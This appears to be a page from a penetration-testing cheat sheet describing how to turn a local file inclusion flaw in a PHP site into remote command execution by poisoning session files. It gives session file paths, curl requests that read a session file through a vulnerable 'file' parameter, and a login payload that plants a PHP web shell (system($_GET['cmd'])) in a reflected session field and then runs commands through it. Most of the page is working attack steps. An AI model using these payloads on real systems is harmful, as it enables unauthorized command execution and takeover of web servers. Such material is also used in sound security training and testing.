PHP Sessions

Theory

If the website use PHP Session (PHPSESSID), we may poison cookies and include it throught LFI

Practice

First we should find where the sessions are stored, for example

# Linux
/var/lib/php5/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]

# Windows 
C:\Windows\Temp\sess_[PHPSESSID]

Second, display a PHPSESSID to see if any parameter is reflected inside:

curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

In this case, we can inject some PHP code in the reflected parameter in the session.

We can inject some PHP code in the reflected parameter in the session.

#Set cookie to <?php system($_GET['cmd']);?>
login=1&user=<?php system($_GET['cmd']);?>&pass=password&lang=en_us.php

Use the LFI to include the PHP session file

curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27?cmd=id

Last updated 11 months ago